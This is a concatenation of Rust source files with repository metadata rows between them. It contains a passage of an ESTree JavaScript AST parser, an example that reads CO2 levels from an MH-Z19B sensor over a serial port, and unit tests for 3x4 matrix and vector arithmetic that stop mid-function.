                let expr = Expression::parse_from(jinit, ctx)?;
                Ok(Box::new(expr))
            })?;
            // Record the declaration; redeclaring an existing `let` binding
            // is reported as `BindingRedeclared`.
            ctx.remember_declaration(kind, &name)?;
            Ok(VariableDeclarator { name, init })
        })?;
        Ok(VariableDeclaration { kind, declarations })
    }
}
impl ParseFrom for FunctionDeclaration {
    /// Parses an ESTree `FunctionDeclaration` and records it in
    /// `ctx.declared_functions` for hoisting.
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        source.expect_str("type", "FunctionDeclaration")?;
        // Reuse similar structure of FunctionExpression and FunctionDeclaration trees:
        let function = FunctionExpression::parse_from(source, ctx)?;
        // id is mandatory in FunctionDeclaration:
        let id = (function.func.id.clone())
            .ok_or_else(|| ParseError::no_attr("id", source.to_error()))?;
        let funcdecl = FunctionDeclaration { id, function };
        ctx.declared_functions.push(funcdecl.clone());
        Ok(funcdecl)
    }
}
impl ParseFrom for ExpressionStatement {
    /// Parses an ESTree `ExpressionStatement`: a bare expression used as a
    /// statement.
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        source.expect_str("type", "ExpressionStatement")?;
        let expression = source.map_node("expression", |node| Expression::parse_from(node, ctx))?;
        Ok(ExpressionStatement { expression })
    }
}
impl ParseFrom for Expression {
    /// Dispatches on the ESTree `"type"` attribute to the matching
    /// expression parser, attaching the source location if available.
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        let loc = source.get_location().map(Box::new);
        let expr_type = source.get_str("type")?;
        let expr = match expr_type.as_str() {
            "ArrayExpression" => {
                let elements =
                    source.map_array("elements", |jelem| Expression::parse_from(jelem, ctx))?;
                let expr = ArrayExpression(elements);
                Expr::Array(expr)
            }
            "AssignmentExpression" => {
                let expr = AssignmentExpression::parse_from(source, ctx)?;
                Expr::Assign(Box::new(expr))
            }
            "BinaryExpression" => {
                let expr = BinaryExpression::parse_from(source, ctx)?;
                Expr::BinaryOp(Box::new(expr))
            }
            "CallExpression" => {
                let callee =
                    source.map_node("callee", |jcallee| Expression::parse_from(jcallee, ctx))?;
                let arguments =
                    source.map_array("arguments", |jarg| Expression::parse_from(jarg, ctx))?;
                Expr::Call(Box::new(CallExpression(callee, arguments)))
            }
            "ConditionalExpression" => {
                // The ternary `test ? consequent : alternate`.
                let condexpr =
                    source.map_node("test", |jtest| Expression::parse_from(jtest, ctx))?;
                let thenexpr =
                    source.map_node("consequent", |jthen| Expression::parse_from(jthen, ctx))?;
                let elseexpr =
                    source.map_node("alternate", |jelse| Expression::parse_from(jelse, ctx))?;
                let expr = ConditionalExpression {
                    condexpr,
                    thenexpr,
                    elseexpr,
                };
                Expr::Conditional(Box::new(expr))
            }
            "FunctionExpression" => {
                let expr = FunctionExpression::parse_from(source, ctx)?;
                Expr::Function(expr)
            }
            "Identifier" => {
                let expr = Identifier::parse_from(source, ctx)?;
                Expr::Identifier(expr)
            }
            "Literal" => {
                let lit = source.get_literal("value")?;
                Expr::Literal(lit)
            }
            "LogicalExpression" => {
                let expr = LogicalExpression::parse_from(source, ctx)?;
                Expr::LogicalOp(Box::new(expr))
            }
            "MemberExpression" => {
                // `computed` distinguishes `obj[prop]` from `obj.prop`.
                let computed = source.get_bool("computed")?;
                let object = source.map_node("object", |jobj| Expression::parse_from(jobj, ctx))?;
                let property =
                    source.map_node("property", |jprop| Expression::parse_from(jprop, ctx))?;
                let expr = MemberExpression(object, property, computed);
                Expr::Member(Box::new(expr))
            }
            "NewExpression" => {
                let callee =
                    source.map_node("callee", |jcallee| Expression::parse_from(jcallee, ctx))?;
                let arguments =
                    source.map_array("arguments", |jarg| Expression::parse_from(jarg, ctx))?;
                let expr = NewExpression(callee, arguments);
                Expr::New(Box::new(expr))
            }
            "ObjectExpression" => {
                let expr = ObjectExpression::parse_from(source, ctx)?;
                Expr::Object(expr)
            }
            "SequenceExpression" => {
                let expr = SequenceExpression::parse_from(source, ctx)?;
                Expr::Sequence(expr)
            }
            "ThisExpression" => Expr::This,
            "UnaryExpression" => {
                let expr = UnaryExpression::parse_from(source, ctx)?;
                Expr::Unary(Box::new(expr))
            }
            "UpdateExpression" => {
                let expr = UpdateExpression::parse_from(source, ctx)?;
                Expr::Update(Box::new(expr))
            }
            _ => {
                return Err(ParseError::UnknownNodeType {
                    value: source.to_error(),
                })
            }
        };
        Ok(Expression { expr, loc })
    }
}
impl ParseFrom for Identifier {
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        // Every identifier we parse is recorded in the context so the
        // enclosing function scope can later work out its free variables.
        let ident = Identifier(source.get_str("name")?);
        ctx.used_identifiers.insert(ident.clone());
        Ok(ident)
    }
}
// Parses a prefix unary operator applied to a single operand.
impl ParseFrom for UnaryExpression {
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        let jop = source.get_str("operator")?;
        let op = match jop.as_str() {
            "+" => UnOp::Plus,
            "-" => UnOp::Minus,
            "!" => UnOp::Exclamation,
            "~" => UnOp::Tilde,
            "delete" => UnOp::Delete,
            "typeof" => UnOp::Typeof,
            "void" => UnOp::Void,
            _ => {
                // Bug fix: the diagnostic previously omitted `delete`, even
                // though it is accepted by the match above.
                return Err(ParseError::UnexpectedValue {
                    want: "+ | - | ! | ~ | delete | typeof | void",
                    value: source.to_error(),
                })
            }
        };
        let argument = source.map_node("argument", |jarg| Expression::parse_from(jarg, ctx))?;
        Ok(UnaryExpression(op, argument))
    }
}
// Parses `++x` / `x++` style update expressions.
impl ParseFrom for UpdateExpression {
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        let operand = source.map_node("argument", |jarg| Expression::parse_from(jarg, ctx))?;
        // `prefix` distinguishes `++x` (true) from `x++` (false).
        let is_prefix = source.get_bool("prefix")?;
        let op = match source.get_str("operator")?.as_str() {
            "++" => UpdOp::Increment,
            "--" => UpdOp::Decrement,
            _ => {
                return Err(ParseError::UnexpectedValue {
                    want: "++ or --",
                    value: source.to_error(),
                })
            }
        };
        Ok(UpdateExpression(op, is_prefix, operand))
    }
}
impl ParseFrom for SequenceExpression {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
let exprs = source.map_array("expressions", |jexpr| Expression::parse_from(jexpr, ctx))?;
Ok(SequenceExpression(exprs))
}
}
// Parses a (non-short-circuiting) binary operator expression.
impl ParseFrom for BinaryExpression {
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        // Operands are parsed left-to-right before the operator is decoded.
        let left = source.map_node("left", |jleft| Expression::parse_from(jleft, ctx))?;
        let right = source.map_node("right", |jright| Expression::parse_from(jright, ctx))?;
        let opstr = source.get_str("operator")?;
        let op = match opstr.as_str() {
            "+" => BinOp::Plus,
            "-" => BinOp::Minus,
            "*" => BinOp::Star,
            "/" => BinOp::Slash,
            "%" => BinOp::Percent,
            "==" => BinOp::EqEq,
            "===" => BinOp::EqEqEq,
            "!=" => BinOp::NotEq,
            "!==" => BinOp::NotEqEq,
            "<" => BinOp::Less,
            ">" => BinOp::Greater,
            "<=" => BinOp::LtEq,
            ">=" => BinOp::GtEq,
            "|" => BinOp::Pipe,
            "^" => BinOp::Hat,
            "&" => BinOp::Ampersand,
            "<<" => BinOp::LtLt,
            ">>" => BinOp::GtGt,
            ">>>" => BinOp::GtGtGt,
            "in" => BinOp::In,
            "instanceof" => BinOp::InstanceOf,
            _ => {
                // Bug fix: the diagnostic previously omitted `!==` and `in`,
                // both of which are accepted by the match above.
                return Err(ParseError::UnexpectedValue {
                    want: "one of: + - * / % == === != !== < > <= >= | ^ & << >> >>> in instanceof",
                    value: source.map_node("operator", |jop| Ok(jop.to_error()))?,
                })
            }
        };
        Ok(BinaryExpression(left, op, right))
    }
}
// Parses a short-circuiting boolean expression (`&&` / `||`).
impl ParseFrom for LogicalExpression {
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        // The operator is decoded first, then the operands left-to-right.
        let op = match source.get_str("operator")?.as_str() {
            "&&" => BoolOp::And,
            "||" => BoolOp::Or,
            _ => {
                return Err(ParseError::UnexpectedValue {
                    want: "&& or ||",
                    value: source.map_node("operator", |jop| Ok(jop.to_error()))?,
                })
            }
        };
        let lhs = source.map_node("left", |jleft| Expression::parse_from(jleft, ctx))?;
        let rhs = source.map_node("right", |jright| Expression::parse_from(jright, ctx))?;
        Ok(LogicalExpression(lhs, op, rhs))
    }
}
// Parses `=` and the compound assignment operators. A compound operator
// carries its underlying binary operator as `Some(BinOp)`; plain `=` is
// represented by `None`.
impl ParseFrom for AssignmentExpression {
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        let jop = source.get_str("operator")?;
        let modop = match jop.as_str() {
            "=" => None,
            "+=" => Some(BinOp::Plus),
            "-=" => Some(BinOp::Minus),
            "*=" => Some(BinOp::Star),
            "/=" => Some(BinOp::Slash),
            "%=" => Some(BinOp::Percent),
            "<<=" => Some(BinOp::LtLt),
            ">>=" => Some(BinOp::GtGt),
            ">>>=" => Some(BinOp::GtGtGt),
            "|=" => Some(BinOp::Pipe),
            "^=" => Some(BinOp::Hat),
            "&=" => Some(BinOp::Ampersand),
            _ => {
                return Err(ParseError::UnexpectedValue {
                    want: "one of: = += -= *= /= %= <<= >>= >>>= |= ^= &=",
                    value: source.map_node("operator", |jop| Ok(jop.to_error()))?,
                })
            }
        };
        // NOTE(review): the right-hand side is parsed before the left-hand
        // side, which affects the order identifiers are recorded into `ctx` —
        // confirm this ordering is intentional.
        let right = source.map_node("right", |jright| Expression::parse_from(jright, ctx))?;
        let left = source.map_node("left", |jleft| Expression::parse_from(jleft, ctx))?;
        Ok(AssignmentExpression(left, modop, right))
    }
}
// Parses an object literal into its list of (key, value) property pairs.
impl ParseFrom for ObjectExpression {
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        source.expect_str("type", "ObjectExpression")?;
        let properties = source.map_array("properties", |jprop| {
            jprop.expect_str("type", "Property")?;
            let keyexpr = jprop.map_node("key", |jkey| Expression::parse_from(jkey, ctx))?;
            // Computed keys keep the whole key expression; otherwise the key
            // must be an identifier or a literal, which is normalised to its
            // string form.
            let key = if jprop.get_bool("computed")? {
                ObjectKey::Computed(keyexpr)
            } else {
                match keyexpr.expr {
                    Expr::Identifier(ident) => ObjectKey::Identifier(ident.0),
                    // String-valued literals use their string value directly;
                    // non-string literals fall back to their display form.
                    Expr::Literal(lit) => match lit.to_json().as_str() {
                        Some(val) => ObjectKey::Identifier(val.into()),
                        None => ObjectKey::Identifier(lit.to_string().into()),
                    },
                    _ => {
                        return Err(ParseError::UnexpectedValue {
                            want: "Identifier|Literal",
                            value: jprop.to_error(),
                        })
                    }
                }
            };
            let value = jprop.map_node("value", |jval| Expression::parse_from(jval, ctx))?;
            Ok((key, value))
        })?;
        Ok(ObjectExpression(properties))
    }
}
// Parses a function expression, computing its free variables from the scope
// information collected while parsing its parameters and body.
impl ParseFrom for FunctionExpression {
    fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
        // Optional function name (anonymous function expressions have none).
        let id: Option<Identifier> =
            source.map_opt_node("id", |jid| Identifier::parse_from(jid, ctx))?;
        // Parameters and body are parsed against a fresh context so that
        // identifier usage/declaration is tracked per function scope.
        let mut inner_ctx = ParserContext::new();
        let params = source.map_array("params", |jparam| {
            Identifier::parse_from(jparam, &mut inner_ctx)
        })?;
        let body = source.map_node("body", |jbody| {
            BlockStatement::parse_from(jbody, &mut inner_ctx)
        })?;
        let ParserContext {
            used_identifiers: mut free_variables,
            declared_variables: variables,
            declared_functions: functions,
            declared_bindings,
        } = inner_ctx;
        // NOTE(review): panics if the body produced any declared bindings —
        // presumably unsupported in function scope here; confirm upstream.
        assert!(declared_bindings.is_empty());
        // `arguments` is implicitly available in every function body, so it
        // never counts as a free variable.
        free_variables.remove(&Identifier::from("arguments"));
        // Identifiers bound by parameters or declared variables are not free.
        for var in params.iter().chain(variables.iter()) {
            free_variables.remove(var);
        }
        // Whatever remains free inside this function is also "used" from the
        // enclosing scope's point of view.
        ctx.used_identifiers.extend(free_variables.iter().cloned());
        let func = Function {
            id,
            params,
            variables,
            functions,
            free_variables,
            body,
            // Missing flags default to `false`.
            is_generator: source.get_bool("generator").unwrap_or(false),
            is_expression: source.get_bool("expression").unwrap_or(false),
            is_async: source.get_bool("async").unwrap_or(false),
        };
        Ok(FunctionExpression {
            func: Rc::new(func),
        })
    }
}
| true |
62be7b9b2c30ebb2ec0913035d07b5191bb185a9
|
Rust
|
peterholak/mh_z19b
|
/examples/raspberry.rs
|
UTF-8
| 703 | 2.71875 | 3 |
[
"MIT"
] |
permissive
|
use mh_z19b::mhz19b;
use std::time::Duration;
use std::thread::sleep;
fn main() {
    // Serial device the MH-Z19B CO2 sensor is attached to on a Raspberry Pi.
    let port_name = "/dev/ttyAMA0";
    // On Windows with a USB to serial adapter.
    // let port_name = "COM4";
    let mut port = mhz19b::serial::connect(port_name, Duration::from_secs(5))
        .expect("Failed to connect.");
    println!("Connected.");
    // Best effort: report but do not abort when the command fails.
    if let Err(e) = mhz19b::set_auto_correction(&mut port, false) {
        eprintln!("Failed to disable auto-correction: {}", e);
    }
    // Take five readings, three seconds apart.
    for _reading in 0..5 {
        match mhz19b::read_co2(&mut port) {
            Ok(level) => println!("CO2 level: {}", level),
            Err(err) => eprintln!("{}", err),
        }
        sleep(Duration::from_secs(3));
    }
}
| true |
4fd8feab9d860a1d6d83fd8a9fe186c56b558c09
|
Rust
|
Feldar99/RustEngine
|
/math/tests/matrix.rs
|
UTF-8
| 29,721 | 3.40625 | 3 |
[] |
no_license
|
extern crate math;
extern crate num;
#[cfg(test)]
mod tests {
use math::matrix::Mat4;
use math::matrix::Mat3;
use math::vector::Vec4;
use math::vector::Vec3;
use math::vector::Vec2;
use num::Zero;
use num::One;
const EPSILON:f32 = 0.0005;
macro_rules! assert_approx_eq {
($left:expr, $right:expr, $epsilon:expr) => {
assert!(($left) < ($right) + ($epsilon),
"\nleft: `{}`,\n right: `{}`,\n epsilon: {}\n\n",
$left,
$right,
$epsilon
);
assert!(($left) > ($right) - ($epsilon),
"\nleft: `{}`,\n right: `{}`,\n epsilon: {}\n\n",
$left,
$right,
$epsilon
);
}
}
    // 4x4 fixture holding the consecutive integers 1..=16 in row-major order.
    fn test_mat4_1() -> Mat4<i32> {
        Mat4{values: [Vec4{x: 1,  y: 2,  z: 3,  w: 4 },
                      Vec4{x: 5,  y: 6,  z: 7,  w: 8 },
                      Vec4{x: 9,  y: 10, z: 11, w: 12},
                      Vec4{x: 13, y: 14, z: 15, w: 16}]}
    }
    // 4x4 fixture continuing the sequence with 17..=32.
    fn test_mat4_2() -> Mat4<i32> {
        Mat4{values: [Vec4{x: 17, y: 18, z: 19, w: 20},
                      Vec4{x: 21, y: 22, z: 23, w: 24},
                      Vec4{x: 25, y: 26, z: 27, w: 28},
                      Vec4{x: 29, y: 30, z: 31, w: 32}]}
    }
    // 3x3 fixture holding 33..=41 in row-major order.
    fn test_mat3_1() -> Mat3<i32> {
        Mat3{values: [Vec3{x: 33, y: 34, z: 35},
                      Vec3{x: 36, y: 37, z: 38},
                      Vec3{x: 39, y: 40, z: 41}]}
    }
    // 3x3 fixture continuing the sequence with 42..=50.
    fn test_mat3_2() -> Mat3<i32> {
        Mat3{values: [Vec3{x: 42, y: 43, z: 44},
                      Vec3{x: 45, y: 46, z: 47},
                      Vec3{x: 48, y: 49, z: 50}]}
    }
    // Homogeneous point (w = 1) used as the 4-component transform input.
    fn test_vec4() -> Vec4<i32> {
        Vec4{x: 1, y: 2, z: 3, w: 1}
    }
    // Float vector with w = 0, used by the rotation test.
    fn test_vec4f() -> Vec4<f32> {
        Vec4{x: 1.0, y: 2.0, z: 3.0, w: 0.0}
    }
    // Homogeneous 2D-style point (z = 1) for 3x3 transforms.
    fn test_vec3() -> Vec3<i32> {
        Vec3{x: 5, y: 6, z: 1}
    }
    // Float counterpart of test_vec3.
    fn test_vec3f_1() -> Vec3<f32> {
        Vec3{x: 5.0, y: 6.0, z: 1.0}
    }
    // Second float vector for cross-product / tensor tests.
    fn test_vec3f_2() -> Vec3<f32> {
        Vec3{x: 10.0, y: 11.0, z: 1.0}
    }
    // 2D translation/scale input for 3x3 transforms.
    fn test_vec2() -> Vec2<i32> {
        Vec2{x: 8, y: 9}
    }
#[test]
fn can_create_matrices () {
let m4 = test_mat4_1();
let m3 = test_mat3_1();
assert_eq!(m4.values[0].x, 1);
assert_eq!(m4.values[0].y, 2);
assert_eq!(m4.values[0].z, 3);
assert_eq!(m4.values[0].w, 4);
assert_eq!(m4.values[1].x, 5);
assert_eq!(m4.values[1].y, 6);
assert_eq!(m4.values[1].z, 7);
assert_eq!(m4.values[1].w, 8);
assert_eq!(m4.values[2].x, 9);
assert_eq!(m4.values[2].y, 10);
assert_eq!(m4.values[2].z, 11);
assert_eq!(m4.values[2].w, 12);
assert_eq!(m4.values[3].x, 13);
assert_eq!(m4.values[3].y, 14);
assert_eq!(m4.values[3].z, 15);
assert_eq!(m4.values[3].w, 16);
assert_eq!(m3.values[0].x, 33);
assert_eq!(m3.values[0].y, 34);
assert_eq!(m3.values[0].z, 35);
assert_eq!(m3.values[1].x, 36);
assert_eq!(m3.values[1].y, 37);
assert_eq!(m3.values[1].z, 38);
assert_eq!(m3.values[2].x, 39);
assert_eq!(m3.values[2].y, 40);
assert_eq!(m3.values[2].z, 41);
}
#[test]
fn has_zero_matrix () {
let m4 = Mat4::<i32>::zero();
let m3 = Mat3::<i32>::zero();
assert_eq!(m4.values[0].x, 0);
assert_eq!(m4.values[0].y, 0);
assert_eq!(m4.values[0].z, 0);
assert_eq!(m4.values[0].w, 0);
assert_eq!(m4.values[1].x, 0);
assert_eq!(m4.values[1].y, 0);
assert_eq!(m4.values[1].z, 0);
assert_eq!(m4.values[1].w, 0);
assert_eq!(m4.values[2].x, 0);
assert_eq!(m4.values[2].y, 0);
assert_eq!(m4.values[2].z, 0);
assert_eq!(m4.values[2].w, 0);
assert_eq!(m4.values[3].x, 0);
assert_eq!(m4.values[3].y, 0);
assert_eq!(m4.values[3].z, 0);
assert_eq!(m4.values[3].w, 0);
assert_eq!(m3.values[0].x, 0);
assert_eq!(m3.values[0].y, 0);
assert_eq!(m3.values[0].z, 0);
assert_eq!(m3.values[1].x, 0);
assert_eq!(m3.values[1].y, 0);
assert_eq!(m3.values[1].z, 0);
assert_eq!(m3.values[2].x, 0);
assert_eq!(m3.values[2].y, 0);
assert_eq!(m3.values[2].z, 0);
}
#[test]
fn can_test_for_zero_matrix () {
let z4 = Mat4::<i32>::zero();
let z3 = Mat3::<i32>::zero();
assert!(z4.is_zero());
assert!(z3.is_zero());
let m4 = test_mat4_1();
let m3 = test_mat3_1();
assert!(!m4.is_zero());
assert!(!m3.is_zero());
}
#[test]
fn has_identity_matrix () {
let m4 = Mat4::<i32>::one();
assert_eq!(m4.values[0].x, 1);
assert_eq!(m4.values[0].y, 0);
assert_eq!(m4.values[0].z, 0);
assert_eq!(m4.values[0].w, 0);
assert_eq!(m4.values[1].x, 0);
assert_eq!(m4.values[1].y, 1);
assert_eq!(m4.values[1].z, 0);
assert_eq!(m4.values[1].w, 0);
assert_eq!(m4.values[2].x, 0);
assert_eq!(m4.values[2].y, 0);
assert_eq!(m4.values[2].z, 1);
assert_eq!(m4.values[2].w, 0);
assert_eq!(m4.values[3].x, 0);
assert_eq!(m4.values[3].y, 0);
assert_eq!(m4.values[3].z, 0);
assert_eq!(m4.values[3].w, 1);
let m3 = Mat3::<i32>::one();
assert_eq!(m3.values[0].x, 1);
assert_eq!(m3.values[0].y, 0);
assert_eq!(m3.values[0].z, 0);
assert_eq!(m3.values[1].x, 0);
assert_eq!(m3.values[1].y, 1);
assert_eq!(m3.values[1].z, 0);
assert_eq!(m3.values[2].x, 0);
assert_eq!(m3.values[2].y, 0);
assert_eq!(m3.values[2].z, 1);
}
#[test]
fn can_add_matrices () {
let m4 = test_mat4_1() + test_mat4_2();
let m3 = test_mat3_1() + test_mat3_2();
assert_eq!(m4.values[0].x, 18);
assert_eq!(m4.values[0].y, 20);
assert_eq!(m4.values[0].z, 22);
assert_eq!(m4.values[0].w, 24);
assert_eq!(m4.values[1].x, 26);
assert_eq!(m4.values[1].y, 28);
assert_eq!(m4.values[1].z, 30);
assert_eq!(m4.values[1].w, 32);
assert_eq!(m4.values[2].x, 34);
assert_eq!(m4.values[2].y, 36);
assert_eq!(m4.values[2].z, 38);
assert_eq!(m4.values[2].w, 40);
assert_eq!(m4.values[3].x, 42);
assert_eq!(m4.values[3].y, 44);
assert_eq!(m4.values[3].z, 46);
assert_eq!(m4.values[3].w, 48);
assert_eq!(m3.values[0].x, 75);
assert_eq!(m3.values[0].y, 77);
assert_eq!(m3.values[0].z, 79);
assert_eq!(m3.values[1].x, 81);
assert_eq!(m3.values[1].y, 83);
assert_eq!(m3.values[1].z, 85);
assert_eq!(m3.values[2].x, 87);
assert_eq!(m3.values[2].y, 89);
assert_eq!(m3.values[2].z, 91);
}
#[test]
fn can_add_assign_matrices () {
let mut m4 = test_mat4_1();
let mut m3 = test_mat3_1();
m4 += test_mat4_2();
m3 += test_mat3_2();
assert_eq!(m4.values[0].x, 18);
assert_eq!(m4.values[0].y, 20);
assert_eq!(m4.values[0].z, 22);
assert_eq!(m4.values[0].w, 24);
assert_eq!(m4.values[1].x, 26);
assert_eq!(m4.values[1].y, 28);
assert_eq!(m4.values[1].z, 30);
assert_eq!(m4.values[1].w, 32);
assert_eq!(m4.values[2].x, 34);
assert_eq!(m4.values[2].y, 36);
assert_eq!(m4.values[2].z, 38);
assert_eq!(m4.values[2].w, 40);
assert_eq!(m4.values[3].x, 42);
assert_eq!(m4.values[3].y, 44);
assert_eq!(m4.values[3].z, 46);
assert_eq!(m4.values[3].w, 48);
assert_eq!(m3.values[0].x, 75);
assert_eq!(m3.values[0].y, 77);
assert_eq!(m3.values[0].z, 79);
assert_eq!(m3.values[1].x, 81);
assert_eq!(m3.values[1].y, 83);
assert_eq!(m3.values[1].z, 85);
assert_eq!(m3.values[2].x, 87);
assert_eq!(m3.values[2].y, 89);
assert_eq!(m3.values[2].z, 91);
}
#[test]
fn can_negate_matrices () {
let m4 = -test_mat4_1();
let m3 = -test_mat3_1();
assert_eq!(m4.values[0].x, -1);
assert_eq!(m4.values[0].y, -2);
assert_eq!(m4.values[0].z, -3);
assert_eq!(m4.values[0].w, -4);
assert_eq!(m4.values[1].x, -5);
assert_eq!(m4.values[1].y, -6);
assert_eq!(m4.values[1].z, -7);
assert_eq!(m4.values[1].w, -8);
assert_eq!(m4.values[2].x, -9);
assert_eq!(m4.values[2].y, -10);
assert_eq!(m4.values[2].z, -11);
assert_eq!(m4.values[2].w, -12);
assert_eq!(m4.values[3].x, -13);
assert_eq!(m4.values[3].y, -14);
assert_eq!(m4.values[3].z, -15);
assert_eq!(m4.values[3].w, -16);
assert_eq!(m3.values[0].x, -33);
assert_eq!(m3.values[0].y, -34);
assert_eq!(m3.values[0].z, -35);
assert_eq!(m3.values[1].x, -36);
assert_eq!(m3.values[1].y, -37);
assert_eq!(m3.values[1].z, -38);
assert_eq!(m3.values[2].x, -39);
assert_eq!(m3.values[2].y, -40);
assert_eq!(m3.values[2].z, -41);
}
#[test]
fn can_subtract_matrices () {
let m4 = test_mat4_1() - test_mat4_2();
let m3 = test_mat3_1() - test_mat3_2();
assert_eq!(m4.values[0].x, -16);
assert_eq!(m4.values[0].y, -16);
assert_eq!(m4.values[0].z, -16);
assert_eq!(m4.values[0].w, -16);
assert_eq!(m4.values[1].x, -16);
assert_eq!(m4.values[1].y, -16);
assert_eq!(m4.values[1].z, -16);
assert_eq!(m4.values[1].w, -16);
assert_eq!(m4.values[2].x, -16);
assert_eq!(m4.values[2].y, -16);
assert_eq!(m4.values[2].z, -16);
assert_eq!(m4.values[2].w, -16);
assert_eq!(m4.values[3].x, -16);
assert_eq!(m4.values[3].y, -16);
assert_eq!(m4.values[3].z, -16);
assert_eq!(m4.values[3].w, -16);
assert_eq!(m3.values[0].x, -9);
assert_eq!(m3.values[0].y, -9);
assert_eq!(m3.values[0].z, -9);
assert_eq!(m3.values[1].x, -9);
assert_eq!(m3.values[1].y, -9);
assert_eq!(m3.values[1].z, -9);
assert_eq!(m3.values[2].x, -9);
assert_eq!(m3.values[2].y, -9);
assert_eq!(m3.values[2].z, -9);
}
#[test]
fn can_subtract_assign_matrices () {
let mut m4 = test_mat4_1();
m4 -= test_mat4_2();
let mut m3 = test_mat3_1();
m3 -= test_mat3_2();
assert_eq!(m4.values[0].x, -16);
assert_eq!(m4.values[0].y, -16);
assert_eq!(m4.values[0].z, -16);
assert_eq!(m4.values[0].w, -16);
assert_eq!(m4.values[1].x, -16);
assert_eq!(m4.values[1].y, -16);
assert_eq!(m4.values[1].z, -16);
assert_eq!(m4.values[1].w, -16);
assert_eq!(m4.values[2].x, -16);
assert_eq!(m4.values[2].y, -16);
assert_eq!(m4.values[2].z, -16);
assert_eq!(m4.values[2].w, -16);
assert_eq!(m4.values[3].x, -16);
assert_eq!(m4.values[3].y, -16);
assert_eq!(m4.values[3].z, -16);
assert_eq!(m4.values[3].w, -16);
assert_eq!(m3.values[0].x, -9);
assert_eq!(m3.values[0].y, -9);
assert_eq!(m3.values[0].z, -9);
assert_eq!(m3.values[1].x, -9);
assert_eq!(m3.values[1].y, -9);
assert_eq!(m3.values[1].z, -9);
assert_eq!(m3.values[2].x, -9);
assert_eq!(m3.values[2].y, -9);
assert_eq!(m3.values[2].z, -9);
}
#[test]
fn can_multiply_matrices_by_scalars () {
let m4 = test_mat4_1() * 2;
let m3 = test_mat3_1() * 3;
assert_eq!(m4.values[0].x, 2);
assert_eq!(m4.values[0].y, 4);
assert_eq!(m4.values[0].z, 6);
assert_eq!(m4.values[0].w, 8);
assert_eq!(m4.values[1].x, 10);
assert_eq!(m4.values[1].y, 12);
assert_eq!(m4.values[1].z, 14);
assert_eq!(m4.values[1].w, 16);
assert_eq!(m4.values[2].x, 18);
assert_eq!(m4.values[2].y, 20);
assert_eq!(m4.values[2].z, 22);
assert_eq!(m4.values[2].w, 24);
assert_eq!(m4.values[3].x, 26);
assert_eq!(m4.values[3].y, 28);
assert_eq!(m4.values[3].z, 30);
assert_eq!(m4.values[3].w, 32);
assert_eq!(m3.values[0].x, 99);
assert_eq!(m3.values[0].y, 102);
assert_eq!(m3.values[0].z, 105);
assert_eq!(m3.values[1].x, 108);
assert_eq!(m3.values[1].y, 111);
assert_eq!(m3.values[1].z, 114);
assert_eq!(m3.values[2].x, 117);
assert_eq!(m3.values[2].y, 120);
assert_eq!(m3.values[2].z, 123);
}
#[test]
fn can_multiply_matrices_by_vectors () {
let v4 = test_mat4_1() * test_vec4();
let v3 = test_mat3_1() * test_vec3();
assert_eq!(v4.x, 18);
assert_eq!(v4.y, 46);
assert_eq!(v4.z, 74);
assert_eq!(v4.w, 102);
assert_eq!(v3.x, 404);
assert_eq!(v3.y, 440);
assert_eq!(v3.z, 476);
}
#[test]
fn can_multiply_matrices () {
let m4 = test_mat4_1() * test_mat4_2();
assert_eq!(m4.values[0][0], 250);
assert_eq!(m4.values[0][1], 260);
assert_eq!(m4.values[0][2], 270);
assert_eq!(m4.values[0][3], 280);
assert_eq!(m4.values[1][0], 618);
assert_eq!(m4.values[1][1], 644);
assert_eq!(m4.values[1][2], 670);
assert_eq!(m4.values[1][3], 696);
assert_eq!(m4.values[2][0], 986);
assert_eq!(m4.values[2][1], 1028);
assert_eq!(m4.values[2][2], 1070);
assert_eq!(m4.values[2][3], 1112);
assert_eq!(m4.values[3][0], 1354);
assert_eq!(m4.values[3][1], 1412);
assert_eq!(m4.values[3][2], 1470);
assert_eq!(m4.values[3][3], 1528);
let m3 = test_mat3_1() * test_mat3_2();
assert_eq!(m3.values[0].x, 4596);
assert_eq!(m3.values[0].y, 4698);
assert_eq!(m3.values[0].z, 4800);
assert_eq!(m3.values[1].x, 5001);
assert_eq!(m3.values[1].y, 5112);
assert_eq!(m3.values[1].z, 5223);
assert_eq!(m3.values[2].x, 5406);
assert_eq!(m3.values[2].y, 5526);
assert_eq!(m3.values[2].z, 5646);
}
#[test]
fn can_multiply_assign_matrices () {
let mut m4 = test_mat4_1();
m4 *= test_mat4_2();
assert_eq!(m4.values[0][0], 250);
assert_eq!(m4.values[0][1], 260);
assert_eq!(m4.values[0][2], 270);
assert_eq!(m4.values[0][3], 280);
assert_eq!(m4.values[1][0], 618);
assert_eq!(m4.values[1][1], 644);
assert_eq!(m4.values[1][2], 670);
assert_eq!(m4.values[1][3], 696);
assert_eq!(m4.values[2][0], 986);
assert_eq!(m4.values[2][1], 1028);
assert_eq!(m4.values[2][2], 1070);
assert_eq!(m4.values[2][3], 1112);
assert_eq!(m4.values[3][0], 1354);
assert_eq!(m4.values[3][1], 1412);
assert_eq!(m4.values[3][2], 1470);
assert_eq!(m4.values[3][3], 1528);
let mut m3 = test_mat3_1();
m3 *= test_mat3_2();
assert_eq!(m3.values[0].x, 4596);
assert_eq!(m3.values[0].y, 4698);
assert_eq!(m3.values[0].z, 4800);
assert_eq!(m3.values[1].x, 5001);
assert_eq!(m3.values[1].y, 5112);
assert_eq!(m3.values[1].z, 5223);
assert_eq!(m3.values[2].x, 5406);
assert_eq!(m3.values[2].y, 5526);
assert_eq!(m3.values[2].z, 5646);
}
#[test]
fn can_divide_matrices_by_scalars () {
